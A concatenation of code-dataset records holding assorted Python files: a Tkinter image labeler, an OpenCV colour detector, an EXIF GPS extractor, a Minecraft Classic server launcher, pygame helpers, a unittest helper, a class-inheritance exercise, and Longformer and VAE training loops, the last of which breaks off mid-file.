click(self,event):\r\n if self.add_selected:\r\n self.add_selected=False\r\n self.window.config(cursor='arrow')\r\n self.add_tracker2(event.x,event.y)\r\n if self.is_right:\r\n self.menu.destroy()\r\n self.is_right = False\r\n self.resume()\r\n\r\n\r\n def select(self):\r\n for child in self.img_frame.winfo_children():\r\n child.destroy()\r\n #self.filename = filedialog.askopenfilename(initialdir=\"/home\", title=\"Select a file\",\r\n # filetypes=((\"Video files\", \"*.mp4\"), (\"all files\", \"*.*\")))\r\n dirr = os.getcwd()\r\n self.filename = filedialog.askdirectory(initialdir=dirr,\r\n title=\"Select a folder\",\r\n )\r\n if self.filename!=None:\r\n\r\n self.start_button.config(state=\"normal\")\r\n self.video_source = self.filename\r\n\r\n\r\n\r\n def next(self):\r\n self.frame_counter+=1\r\n if self.frame_counter==self.frame_num:\r\n self.frame_counter=0\r\n img,ret=self.get_frame(self.frame_counter)\r\n if ret:\r\n self.load_all()\r\n else:\r\n self.frame_counter -= 1\r\n\r\n def prev(self):\r\n self.frame_counter-=1\r\n img,ret=self.get_frame(self.frame_counter)\r\n if ret:\r\n self.load_all()\r\n else:\r\n self.frame_counter += 1\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n def tag(self,cell_num):\r\n #choosed= eg.buttonbox(\"Choose the correct label? (if you close this window, Nothing will be saved)\",\r\n # choices=[\"Healthy\", \"First type\", \"Second type\",\"Unknown\"])\r\n ch=my_Buttonbox(self.window)\r\n choosed=ch.label\r\n k=cell_num\r\n if type(choosed)==int:\r\n label=int(choosed)\r\n ff = open(self.out_folder + '/' + str(k+1) + '.txt', 'r')\r\n aa=ff.readline()\r\n ff.close()\r\n ff = open(self.out_folder + '/' + str(k+1) + '.txt', 'w')\r\n ff.write(aa+str(label)+'\\n')\r\n ff.write(str(self.p_size) + '\\n')\r\n ff.close()\r\n\r\n\r\n\r\n\r\n def cancel(self):\r\n for child in self.img_frame.winfo_children():\r\n child.destroy()\r\n for child in self.labelframe3.winfo_children():\r\n child.destroy()\r\n self.prev_button.config(state=\"disabled\")\r\n self.next_button.config(state=\"disabled\")\r\n self.cancel_button.config(state=\"disabled\")\r\n self.addt_button.config(state=\"disabled\")\r\n self.start_button.config(state=\"normal\")\r\n self.choose_button.config(state=\"normal\")\r\n\r\n\r\n\r\n\r\n\r\n def on_closing(self):\r\n\r\n self.window.destroy()\r\n\r\n\r\n def dnd_accept(self, source, event):\r\n return self\r\n def dnd_enter(self, source, event):\r\n k=self.name_dict[source.name]\r\n if k>=0:\r\n self.rect_xy[k]=None\r\n self.canvas.focus_set() # Show highlight border\r\n x, y,mx,my = source.where(self.canvas, event,self.p_size)\r\n if k>=0:\r\n self.cell_mid[k][0]=mx\r\n self.cell_mid[k][1]=my\r\n\r\n x1, y1, x2, y2 = source.canvas.bbox(source.id)\r\n dx, dy = x2-x1, y2-y1\r\n self.dndid = self.canvas.create_rectangle(x, y, x+dx, y+dy)\r\n self.dnd_motion(source, event)\r\n\r\n def dnd_motion(self, source, event):\r\n k=self.name_dict[source.name]\r\n x, y,mx,my = source.where(self.canvas, event,self.p_size)\r\n if k>=0:\r\n self.cell_mid[k][0]=mx\r\n self.cell_mid[k][1]=my\r\n self.rect_xy[k] =[self.cell_mid[k][0]-self.p_size,self.cell_mid[k][1]-self.p_size,self.cell_mid[k][0]+self.p_size,self.cell_mid[k][1]+self.p_size]\r\n x1, y1, x2, y2 = self.canvas.bbox(self.dndid)\r\n self.canvas.move(self.dndid, x-x1, y-y1)\r\n\r\n def dnd_leave(self, source, event):\r\n self.window.focus_set() # Hide highlight border\r\n self.canvas.delete(self.dndid)\r\n self.dndid = None\r\n\r\n def dnd_commit(self, source, event):\r\n k = self.name_dict[source.name]\r\n self.dnd_leave(source, event)\r\n x, y,mx,my = source.where(self.canvas, event,self.p_size)\r\n if k>=0:\r\n self.cell_mid[k][0]=mx\r\n self.cell_mid[k][1]=my\r\n source.attach(self.canvas, x, y)\r\n\r\n\r\na=App1(tkinter.Tk(),'Nimaad labeling App')\r\na.window.mainloop()\r\n","repo_name":"nimaadmed/Ground-Truth-Labeler","sub_path":"Image_labeler/Image_labeler.py","file_name":"Image_labeler.py","file_ext":"py","file_size_in_byte":19792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7833175845","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH,1080)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT,720)\n\nwhile True:\n ret , frame = cap.read()\n hsv_frame = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n height,width,_ = hsv_frame.shape\n \n center_x = int(width/2)\n center_y = int(height/2)\n \n pixel_center = hsv_frame[center_y, center_x] \n hue_value = pixel_center[0]\n \n color = \"Undefined\"\n if hue_value < 5 :\n color = \"Red\"\n elif hue_value < 22 :\n color = \"Orange\"\n elif hue_value < 33 :\n color = \"Yellow\"\n elif hue_value < 78 :\n color = \"Green\"\n elif hue_value < 131 :\n color = \"Blue\"\n elif hue_value < 170 :\n color = \"Violet\" \n else : \n color = \"Red\"\n \n pixel_center_bgr = frame[center_y, center_x] \n b,g,r = int(pixel_center_bgr[0]),int(pixel_center_bgr[1]),int(pixel_center_bgr[2])\n \n cv2.rectangle(frame,(center_x-200,10),(center_x+200,120),(255,255,255),-1)\n cv2.putText(frame,color,(center_x-200,100),0,3,(b,g,r),5)\n cv2.circle(frame,[center_x,center_y],2,(0,0,0),2)\n \n cv2.imshow('frame',frame)\n if cv2.waitKey(27) == ord('q') :\n break\n \ncap.release() \ncv2.destroyAllWindows() ","repo_name":"MohammedHameds/Color-Recognition-By-OpenCV","sub_path":"detect colors using HSV.py","file_name":"detect colors using HSV.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24394435263","text":"import argparse\nfrom xtractEXIF import *\nfrom os import listdir\nfrom os.path import isfile, isdir, join\n\nRED = '\\033[0;31m'\nGREEN = '\\033[0;32m'\nRESET = '\\033[0m'\n\ndef print_banner():\n with open('banner.txt', 'r') as fd:\n print('\\n'+fd.read())\n\n\ndef getImageFiles(dir):\n if not isdir(dir):\n return None\n onlyfiles = [f for f in listdir(dir) if isfile(join(dir, f))]\n return onlyfiles\n\n\ndef main():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-s', '--single', help='Specify a single image to extract the Data')\n group.add_argument('-d', '--dir', help='Specify a file with images to extract the Data')\n parser.add_argument('-v', '--verbose', help='need more verbose ouput', action='store_true')\n parser.add_argument('-q', '--quiet', help='dont clutter my terminal with garbage', action='store_true')\n\n args = parser.parse_args()\n\n if not args.quiet:\n print_banner()\n\n if args.single:\n gps = getGPS(args.single)\n if gps:\n print(GREEN + 'GPS data found: ')\n to_print = f'{GREEN}{args.single}: {gps[\"latitude\"][\"direction\"]} {gps[\"latitude\"][\"value\"]} {gps[\"longitude\"][\"direction\"]} {gps[\"longitude\"][\"value\"]}{RESET}'\n to_print = '{0}: {1} {2} {3} {4}: https://www.google.com/maps/search/?api=1&query={2},{4}'.format(args.single, gps['latitude']['direction'], gps['latitude']['value'], gps['longitude']['direction'], gps['longitude']['value'])\n print(GREEN + to_print + RESET)\n else:\n print(RED + '[-] No GPS data found on the image' + RESET)\n elif args.dir:\n files = getImageFiles(args.dir)\n if not files:\n print(RED + 'No images found in the directory' + RESET)\n else:\n print(GREEN, end='')\n for file in files:\n gps = getGPS(join(args.dir, file))\n if not gps:\n continue\n to_print = '{0}: {1} {2} {3} {4}: https://www.google.com/maps/search/?api=1&query={2},{4}'.format(file, gps['latitude']['direction'], gps['latitude']['value'], gps['longitude']['direction'], gps['longitude']['value'])\n print(to_print)\n print(RESET, end='')\n else:\n parser.print_help()\n exit(2)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Anex007/falcon","sub_path":"falcon.py","file_name":"falcon.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43010625990","text":"from subprocess import PIPE, Popen\r\nfrom datetime import datetime\r\nfrom threading import Timer\r\nfrom shutil import copy\r\nfrom os import system\r\nimport schedule\r\n\r\nstart_cmd = \"java -Xms512M -Xmx512M -Dhttp.proxyHost=betacraft.pl -cp minecraft-server.jar com.mojang.minecraft.server.MinecraftServer\"\r\nserver_config = {}\r\n\r\n\r\ndef logger(string):\r\n now_hour = datetime.now().hour\r\n now_minute = datetime.now().minute\r\n now_second = datetime.now().second\r\n if len(str(now_hour)) == 1: now_hour = \"0\" + str(now_hour)\r\n if len(str(now_minute)) == 1: now_minute = \"0\" + str(now_minute)\r\n if len(str(now_second)) == 1: now_second = \"0\" + str(now_second)\r\n time = str(now_hour) + \":\" + str(now_minute) + \":\" + str(now_second)\r\n\r\n print(\" \" + time + \" \" + string)\r\n\r\n\r\ndef getServerConfig():\r\n with open('server.properties') as f:\r\n for line in f:\r\n if \"=\" in line:\r\n name, value = line.split(\"=\", 1)\r\n server_config[name.strip()] = value.strip()\r\n\r\n\r\ndef createBackup():\r\n now = str(datetime.now())[:19]\r\n now = now.replace(\":\", \"-\")\r\n now = now.replace(\" \", \"_\")\r\n\r\n copy(\"server_level.dat\", \".\\\\backups\\\\server_level_backup_\" + str(now) + \".dat\")\r\n logger(\"Level backup created\")\r\n\r\n\r\ndef autoBackupThread():\r\n i = 1\r\n Timer(i, autoBackupThread).start()\r\n schedule.run_pending()\r\n\r\n\r\ndef serverConsoleThread():\r\n i = 1\r\n Timer(i, serverConsoleThread).start()\r\n while process.poll() is None:\r\n server_output = process.stdout.readline()\r\n print(server_output)\r\n\r\n\r\ngetServerConfig()\r\nsystem(\"title Classic Revived 0.0.18a_02 - Server Port: \" + server_config[\"port\"])\r\nprocess = Popen(\"cmd /c \" + start_cmd, stdin=PIPE, stdout=PIPE)\r\nschedule.every(6).hours.do(createBackup)\r\nlogger(\"Scheduling backups\")\r\nautoBackupThread()\r\ncreateBackup()\r\n","repo_name":"Liathers/Classic-server-script","sub_path":"start server.py","file_name":"start server.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33424746302","text":"from config import *\nimport pygame\nimport time\nimport math\n\n\npygame.init()\n\n\ndef f_pass():\n pass\n\n\ndef interpolate_avg(old, new, speed):\n return old + (new - old) * speed\n\n\ndef clamp(val, min, max):\n if val < min:\n return min\n elif val > max:\n return max\n else:\n return val\n\n\ndef clamp_min(val, min):\n if val < min:\n return min\n else:\n return val\n\n\ndef clamp_max(val, max):\n if val > max:\n return max\n else:\n return val\n\n\ndef rel_bool(val): # shit name (relative bool??????)\n if val:\n return 1\n else:\n return -1\n\n\ndef get_scaled_mousepos(scale):\n mpos = pygame.mouse.get_pos()\n\n return (mpos[0] / scale, mpos[1] / scale)\n\n\ndef get_distance(pos1, pos2):\n distX = pos2[0] - pos1[0]\n distY = pos2[1] - pos1[1]\n\n return math.sqrt((distX ** 2) + (distY ** 2))\n\n\ndef get_angle(pos1, pos2):\n diffX = pos2[0] - pos1[0]\n diffY = pos2[1] - pos1[1]\n\n if diffX == 0: # TODO might be able to remove this\n diffX += 1\n\n angle = math.atan(diffY / diffX)\n\n if pos2[0] < pos1[0]:\n angle += math.pi\n\n return angle\n\ndef get_visual_position(x, y, z):\n return (\n x * TILE_WIDTH - z * TILE_WIDTH,\n z * TILE_STAGGER + x * TILE_STAGGER - y * TILE_HEIGHT\n )\n\n# Dynamic debug print\ndebug_font = pygame.font.Font(None, 24)\ndebug_lines = []\n\n\ndef debug_clear():\n debug_lines.clear()\n\n\ndef debug_add(val):\n debug_lines.append(val)\n\n\ndef debug_draw(x=8, y=8):\n line_height = 16\n line_counter = 0\n surf_render = pygame.display.get_surface() # final surface to render to\n\n for l in debug_lines:\n # temporary surface for text alone\n surf_text = debug_font.render(str(l), True, \"White\")\n rect_text = surf_text.get_rect(\n topleft=(x, y + line_counter * line_height)) # text position\n\n pygame.draw.rect(surf_render, \"Black\", rect_text)\n surf_render.blit(surf_text, rect_text)\n\n line_counter += 1\n\n# Debugging timers\n\nclass DebugTimer:\n def __init__(self, label=\"\"):\n self.reset()\n self.label = label\n\n def reset(self):\n self.time_start = 0\n self.time_stop = 0\n self.value = 0\n self.value_avg = 0\n self.value_max = 0\n\n def start(self):\n if DEBUG_TIMERS:\n self.time_start = time.time()\n \n def stop(self):\n if DEBUG_TIMERS:\n self.time_stop = time.time()\n\n # Maximum calculation\n self.value_max = max(self.value_max, self.time_stop - self.time_start)\n\n # Duration calculation\n self.value = self.time_stop - self.time_start\n\n # Average calculation\n if self.value_avg <= 0: # Is this the timer's first run?\n self.value_avg += self.value\n else:\n self.value_avg += self.value\n self.value_avg /= 2\n\n def get_val(self):\n return int(self.value * 1000)\n \n def get_avg(self):\n return int(self.value_avg * 1000)\n \n def get_max(self):\n return int(self.value_max * 1000)\n \ndebug_timers = {\n \"worldgen\": DebugTimer(\"World generation\"),\n \"chunkcache\": DebugTimer(\"Chunk caching\"),\n \"cameradraw\": DebugTimer(\"Camera drawing\"),\n \"entityupdate\": DebugTimer(\"Entity updating\")\n}","repo_name":"Driftini/wanderlust","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35008298276","text":"import unittest\n\n\nclass CollectionTest(unittest.TestCase):\n\n def assertList(self, result, expect):\n # Verifies lists have the same contents\n lhs = [r for r in result]\n lhs.sort()\n rhs = list(expect)\n rhs.sort()\n if not lhs and rhs or rhs and not lhs:\n self.fail(\n 'One of the lists is empty: ' + str(lhs) + \" != \" + str(rhs))\n for i in lhs:\n if i not in rhs:\n self.fail(str(i) + ' is not in ' + str(rhs))\n for i in rhs:\n if i not in lhs:\n self.fail(str(i) + ' is not in ' + str(lhs))\n\n def assertDictContents(self, result, expect, exact=True):\n for r, e in zip(sorted(result.items()), sorted(expect.items())):\n if r[0] != e[0]: # compare keys\n self.fail(\"Dictionary keys: %s != %s\\n\"\n \"Dictionaries not Equal: result: %s, expect: %s\" %\n (str(r[0]), str(e[0]), result, expect))\n base_message = (\"Dictionary key contents %s mismatch: key: %s\\n\"\n \"result contents: %s\\n\"\n \"expect contents: %s\\n\"\n \"result: %s\\n expect: %s\\n\")\n if type(r[1]) != type(e[1]):\n self.fail(base_message % (\"type\", str(r[0]), str(r[1]),\n str(e[1]), result, expect))\n if isinstance(r[1], basestring):\n if r[1] != e[1]:\n self.fail(base_message % (\"string\", str(r[0]), str(r[1]),\n str(e[1]), result, expect))\n elif isinstance(r[1], (list, tuple, set)):\n if sorted(r[1]) != sorted(e[1]):\n self.fail(base_message % (\"list\", str(r[0]), str(r[1]),\n str(e[1]), result, expect))\n elif isinstance(r[1], dict):\n if not self.assertDictContents(r[1], e[1]):\n self.fail(base_message % ('dictionary', str(r[0]),\n str(r[1]), str(e[1]), result,\n expect))\n return True\n","repo_name":"duikboot/snippets","sub_path":"extratest.py","file_name":"extratest.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36690551566","text":"# 다중 상속 연습\n\nclass Animal:\n def move(self):\n pass\n \n \nclass Dog(Animal):\n name = '구름이'\n \n def move(self):\n print('구름이는 두 달에 한 번씩 미용실에 간다.')\n \n \nclass Cat(Animal):\n name = '야옹이'\n \n def move(self):\n print('야옹이는 한 달에 한 번씩 pc방에 간다.')\n print('밤에 눈빛이 빛난다.')\n\nclass Wolf(Dog, Cat):\n pass\n\nclass Fox(Cat, Dog):\n def move(self):\n print('난 여우라고 해')\n \n def foxMethod(self):\n print('여우 고유 메서드')\n \ndog = Dog()\nprint(dog.name)\ndog.move()\nprint(\"=\" * 50)\n\ncat = Cat()\nprint(cat.name)\ncat.move()\nprint(\"=\" * 50) \n\nwolf = Wolf()\nprint(wolf.name)\nwolf.move()\nprint(\"=\" * 50)\n\nfox = Fox()\nprint(fox.name)\nfox.move()\nfox.foxMethod()\nprint(\"=\" * 50)\n\nprint(Wolf.__mro__) # 클래스 탐색 순서 : (, , , , )\nprint(Fox.__mro__)\nprint(\"=\" * 50)\n\nsbs = wolf\nsbs.move()\nprint(\"=\" * 50)\n\nsbs = fox\nsbs.move()\nprint(\"=\" * 50)\n\nanimals = (dog, cat, wolf, fox)\nfor a in animals:\n a.move()\n print()\n\n\n\n\n\n\n \n","repo_name":"Youkwangjin/python","sub_path":"pypro1/pack2/test31.py","file_name":"test31.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5593904085","text":"import datetime\nimport time\n\nimport numpy\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.distributed import DistributedSampler\nfrom transformers import LongformerForSequenceClassification, AdamW\n\nfrom Models.Base.trainer_base import Trainer_Base\nfrom Models.Longformer_Classify.eval_model import Eval_Model_For_Long\nfrom Models.Longformer_Classify.predict_unlabel import Predicter\nfrom Models.coteaching_longformer.dataset_for_long import Dataset_Long, Collect_FN_CoT\nfrom compent.checkpoint import CheckPointer_Normal\nfrom compent.comm import is_main_process, synchronize, get_rank\nfrom compent.metric_logger import MetricLogger\nfrom compent.utils import move_to_device, reduce_loss_dict\n\ndevice = torch.device('cuda')\n\nbatch_size = 3\n\n\nclass Trainer_Longformer_CoT(Trainer_Base):\n def __init__(self, cfg, logger, distributed, sentences_all):\n super(Trainer_Longformer_CoT, self).__init__(cfg = cfg, logger = logger, distributed = distributed)\n self.checkpointer = CheckPointer_Normal(cfg = cfg, logger = logger, rank = get_rank())\n dataloader_eval = self.__build_dataloader_eval_longformer__(sentences_all.val_sentence,\n sentences_all.val_GT_label,\n for_train = False)\n self.evaler = Eval_Model_For_Long(self.cfg, self.logger, distributed = True, rank = self.rank,\n dataloader_eval = dataloader_eval)\n\n def __build_dataloader_coteaching__(self, sentences, labels, GT_label, for_train):\n collect_fn = Collect_FN_CoT()\n dataset = Dataset_Long(sentences, labels, GT_label)\n sampler = DistributedSampler(dataset, shuffle = for_train)\n dataloader = DataLoader(dataset, batch_size = batch_size, sampler = sampler,\n collate_fn = collect_fn)\n return dataloader\n\n def train_model(self, sentences, labels, GT_label = None, finetune_from_pretrain = True):\n self.logger.info('finetune distributed:{}'.format(self.distributed))\n\n sentences, labels, GT_label = self.upsample_balance_with_one_extra(sentences, labels, GT_label)\n # sample_number_per_class = self.get_classes_count(labels)\n # self.logger.info('sample_number_per_class:{}'.format(sample_number_per_class))\n\n dataloader_train = self.__build_dataloader_coteaching__(sentences, labels, GT_label, for_train = True)\n\n self.logger.info('finetune from pretrain, load pretrain model')\n self.model1 = LongformerForSequenceClassification.from_pretrained('allenai/longformer-base-4096',\n num_labels = self.cfg.model.number_classes,\n gradient_checkpointing = True)\n self.model1.train()\n self.model1 = self.model1.to(device)\n if (self.distributed):\n model1 = torch.nn.SyncBatchNorm.convert_sync_batchnorm(self.model1)\n self.model1 = torch.nn.parallel.DistributedDataParallel(\n model1, device_ids = [self.rank], output_device = self.rank, # find_unused_parameters=True\n )\n\n self.model2 = LongformerForSequenceClassification.from_pretrained('allenai/longformer-base-4096',\n num_labels = self.cfg.model.number_classes,\n gradient_checkpointing = True)\n self.model2.train()\n self.model2 = self.model2.to(device)\n if (self.distributed):\n model2 = torch.nn.SyncBatchNorm.convert_sync_batchnorm(self.model2)\n self.model2 = torch.nn.parallel.DistributedDataParallel(\n model2, device_ids = [self.rank], output_device = self.rank, # find_unused_parameters=True\n )\n\n self.logger.info('rank:{},build eval dataset...'.format(self.rank))\n\n acc = self.__do_train__(dataloader = dataloader_train)\n self.logger.info('acc:{}'.format(acc))\n\n def get_num_remember(self):\n tail_keep = 1\n ans = numpy.ones(9000, dtype = numpy.int) * tail_keep\n ans[:300] = batch_size\n ans[300:800] = 2\n self.logger.info(ans)\n self.logger.visdom_text('remember number:{}'.format(str(ans)), win_name = 'remember number')\n return ans\n\n def __do_train__(self, dataloader):\n self.logger.info('start training')\n self.model1.train()\n self.model2.train()\n\n meters = MetricLogger(delimiter = \" \")\n end = time.time()\n\n optimizer1 = AdamW(self.model1.parameters(), lr = 1e-5)\n optimizer2 = AdamW(self.model2.parameters(), lr = 1e-5)\n\n remember_num = self.get_num_remember()\n\n best_res_1 = 0\n best_res_2 = 0\n all_best = 0\n\n total_epoch = 3\n total_itr = 0\n\n for epoch in range(total_epoch):\n self.logger.info('total epoch:{}, cur epoch:{}'.format(total_epoch, epoch))\n dataloader.sampler.set_epoch(epoch)\n for iteration, batch in enumerate(dataloader):\n total_itr += 1\n data_time = time.time() - end\n batch = move_to_device(batch)\n optimizer1.zero_grad()\n optimizer2.zero_grad()\n # input_ids: [16,128] label_id:[16]\n output1 = self.model1(input_ids = batch['input_ids'],\n attention_mask = batch['attention_mask'])\n pred_1 = output1.logits\n\n output2 = self.model2(input_ids = batch['input_ids'],\n attention_mask = batch['attention_mask'])\n pred_2 = output2.logits\n\n loss_1, loss_2, pure_rate_1, pure_rate_2 = self.coteaching_loss(pred_1, pred_2,\n labels = batch['labels'],\n GT_labels = batch['GT_labels'],\n num_remember = remember_num[total_itr])\n\n loss_dict_reduced = reduce_loss_dict({'loss_1': loss_1, 'loss_2': loss_2})\n losses_reduced = sum(loss for loss in loss_dict_reduced.values())\n meters.update(loss = losses_reduced, **loss_dict_reduced)\n loss_1.backward()\n loss_2.backward()\n optimizer1.step()\n optimizer2.step()\n\n batch_time = time.time() - end\n end = time.time()\n meters.update(time = batch_time, data = data_time)\n meters.update(pure_rate_1 = pure_rate_1, pure_rate_2 = pure_rate_2)\n\n eta_seconds = meters.time.global_avg * (self.cfg.classifier.total_steps - iteration)\n eta_string = str(datetime.timedelta(seconds = int(eta_seconds)))\n\n if iteration % 10 == 0:\n self.logger.info(\n meters.delimiter.join(\n [\n \"eta: {eta}\",\n \"iter: {iter}\",\n \"total_itr: {total_itr}\",\n \"{meters}\",\n \"lr: {lr:.6f}\",\n \"max mem: {memory:.0f}\",\n ]\n ).format(\n eta = eta_string,\n iter = iteration,\n total_itr = len(dataloader),\n meters = str(meters),\n lr = optimizer1.param_groups[0][\"lr\"],\n memory = torch.cuda.max_memory_allocated() / 1024.0 / 1024.0,\n ),\n show_one = True\n )\n self.logger.plot_record(value = meters.loss.median, win_name = 'total loss')\n self.logger.plot_record(value = meters.loss_1.median, win_name = 'loss_1')\n self.logger.plot_record(value = meters.loss_2.median, win_name = 'loss_2')\n self.logger.plot_record(value = meters.pure_rate_1.median, win_name = 'pure_rate_1')\n self.logger.plot_record(value = meters.pure_rate_2.median, win_name = 'pure_rate_2')\n self.logger.plot_record(value = remember_num[total_itr].tolist(), win_name = 'remember_num')\n self.logger.visdom_text(text = 'epoch:{}, itr:{}'.format(epoch, iteration), win_name = 'epoch_itr')\n\n if (iteration + 0) % 100 == 0:\n self.logger.info('start eval...'.format(self.rank))\n synchronize()\n res_dict_1 = self.evaler(self.model1)\n res_dict_2 = self.evaler(self.model2)\n if (is_main_process()):\n f11 = res_dict_1['f1_micro']\n f22 = res_dict_2['f1_micro']\n self.logger.plot_record(f11, win_name = 'classifier_1 eval f1')\n self.logger.plot_record(f22, win_name = 'classifier_2 eval f1')\n if (f11 > best_res_1):\n best_res_1 = f11\n if (f11 > all_best):\n all_best = f11\n self.checkpointer.save_to_best_model_file(model = self.model1, other_info = res_dict_1)\n if (f22 > best_res_2):\n best_res_2 = f22\n if (f22 > all_best):\n all_best = f22\n self.checkpointer.save_to_best_model_file(model = self.model2, other_info = res_dict_2)\n self.logger.info('best classifier 1 f1_micro:{}'.format(best_res_1))\n self.logger.info('best classifier 2 f1_micro:{}'.format(best_res_2))\n\n self.logger.visdom_text(text = 'best classifier 1 f1_micro:{}'.format(best_res_1),\n win_name = 'best_f1_cls1')\n self.logger.visdom_text(text = 'best classifier 2 f1_micro:{}'.format(best_res_2),\n win_name = 'best_f1_cls2')\n\n self.logger.info('eval over')\n synchronize()\n\n # synchronize()\n # res_dict_1 = self.evaler(self.model1)\n # if (is_main_process()):\n # f11 = res_dict_1['f1_micro']\n # self.logger.plot_record(f11, win_name = 'classifier eval f1')\n # if (f11 > best_res_1):\n # best_res_1 = f11\n # self.checkpointer.save_to_best_model_file(model = self.model1, other_info = res_dict_1)\n # self.logger.info('best f1_micro:{}'.format(best_res_1))\n # self.logger.visdom_text(text = 'best f1_micro:{}'.format(best_res_1), win_name = 'best_f1')\n synchronize()\n self.logger.plot_record(value = best_res_1, win_name = 'itr classifier_1 best f1')\n self.logger.plot_record(value = best_res_2, win_name = 'itr classifier_2 best f1')\n return best_res_1\n\n def do_label_sentences(self, sentences):\n self.logger.info('start do_label_sentences'.format(self.rank))\n if (self.model1 is None):\n self.model1 = LongformerForSequenceClassification.from_pretrained('allenai/longformer-base-4096',\n num_labels = self.cfg.model.number_classes,\n gradient_checkpointing = True)\n self.checkpointer.load_from_best_model(self.model1)\n self.model1 = self.model1.to(device)\n if (self.distributed):\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(self.model1)\n self.model1 = torch.nn.parallel.DistributedDataParallel(\n model, device_ids = [self.rank], output_device = self.rank, # find_unused_parameters=True\n )\n self.model1.eval()\n self.logger.info('eval to check before do_label_sentences')\n res = self.evaler(self.model1)\n self.logger.info('load from best model, model res:{}'.format(res))\n self.logger.info('do_label_sentences total unlabeled sentences:{}'.format(self.rank, len(sentences)))\n dataloader_sentence = self.__build_dataloader_eval_longformer__(sentences, labels = None, for_train = False)\n predicter = Predicter(cfg = self.cfg, logger = self.logger, distributed = True, rank = self.rank,\n dataloader_sentence = dataloader_sentence, model = self.model1)\n sentences_all, labels = predicter()\n self.model1.train()\n return sentences_all, labels\n","repo_name":"zhanglu-cst/ClassKG","sub_path":"Models/coteaching_longformer/trainer_coT_longformer.py","file_name":"trainer_coT_longformer.py","file_ext":"py","file_size_in_byte":13291,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"34"} +{"seq_id":"44007833159","text":"import numpy as np\nimport torch\nfrom torchvision.utils import make_grid\nfrom base import BaseTrainer\nfrom utils import inf_loop, MetricTracker\nfrom utils.gradcam import GradCam\nfrom utils.ramps import sigmoid_rampup\n\nclass Trainer(BaseTrainer):\n \"\"\"\n Trainer class\n \"\"\"\n\n def __init__(self, model, criterion, metric_ftns, optimizer, config, device,\n data_loader, valid_data_loader=None, lr_scheduler=None, len_epoch=None):\n super().__init__(model, criterion, metric_ftns, optimizer, config)\n self.config = config\n self.device = device\n self.data_loader = data_loader\n if len_epoch is None:\n # epoch-based training\n self.len_epoch = len(self.data_loader)\n else:\n # iteration-based training\n self.data_loader = inf_loop(data_loader)\n self.len_epoch = len_epoch\n self.valid_data_loader = valid_data_loader\n self.do_valid = True #self.valid_data_loader is not None\n self.lr_scheduler = lr_scheduler\n self.log_step = 50 #int(np.sqrt(data_loader.batch_size))\n\n self.train_metrics = MetricTracker(\n 'loss', 'kld_loss', 'recons_loss',\n # *[m.__name__ for m in self.metric_ftns],\n writer=self.writer)\n self.valid_metrics = MetricTracker(\n 'loss', 'kld_loss', 'recons_loss', \n # *[m.__name__ for m in self.metric_ftns],\n writer=self.writer)\n\n # self.grad_cam = GradCam(self.model)\n\n self.fix_noise = None\n\n def _train_epoch(self, epoch):\n \"\"\"\n Training logic for an epoch\n\n :param epoch: Integer, current training epoch.\n :return: A log that contains average loss and metric in this epoch.\n \"\"\"\n self.model.train()\n self.train_metrics.reset()\n\n # (1) from the Pytorch_VAE\n # kld_weight = batchsize / image_amount \n # kld_weight = 1./len(self.data_loader)\n\n # (2) from the last answaer \n # in https://stats.stackexchange.com/questions/332179/how-to-weight-kld-loss-vs-reconstruction-loss-in-variational-auto-encoder\n # kld_weight = latent_size / image_size(H*W)\n D = self.config['arch']['args']['latent_dim']\n H = self.config['train_loader']['args']['im_res']\n kld_norm = D/(H*H*3)\n w_kld = self.config['w_kld']\n # w_kld = sigmoid_rampup(current=epoch-1, rampup_length=self.epochs//4)\n for batch_idx, (data, target) in enumerate(self.data_loader):\n data, target = data.to(self.device), target.to(self.device)\n\n self.optimizer.zero_grad()\n output, mu, logvar = self.model(data)\n kld_loss = self.model.kld_loss(mu, logvar)\n recons_loss = self.model.recons_loss(data, output)\n loss = w_kld*kld_norm*kld_loss+recons_loss\n # loss = recons_loss\n\n loss.backward()\n self.optimizer.step()\n\n self.train_metrics.update('loss', loss.item())\n self.train_metrics.update('kld_loss', kld_loss.item())\n self.train_metrics.update('recons_loss', recons_loss.item())\n\n # for met in self.metric_ftns:\n # self.train_metrics.update(met.__name__, met(output, target))\n\n if (batch_idx+1) % self.log_step == 0:\n logstr = 'Train Epoch: {} {} Loss: {:.6f} [KLD: {:.6f}, Recons: {:.6f}] W_KLD:{:.6f}'.format(\n epoch, self._progress(batch_idx),\n self.train_metrics.current('loss')/self.log_step,\n self.train_metrics.current('kld_loss')/self.log_step,\n self.train_metrics.current('recons_loss')/self.log_step,\n w_kld)\n\n self.writer.set_step((epoch - 1) * self.len_epoch + batch_idx)\n # # log metrics\n # for met in self.metric_ftns:\n # logstr = logstr + \\\n # \" {}: {:.3f}\".format(\n # met.__name__, self.train_metrics.current(met.__name__)/self.log_step)\n\n self.train_metrics.log_all(log_step=self.log_step)\n self.logger.debug(logstr)\n\n # visulization\n N_sample = 8\n vis_im = torch.cat([\n data[:N_sample, ...],\n output[:N_sample, ...]\n 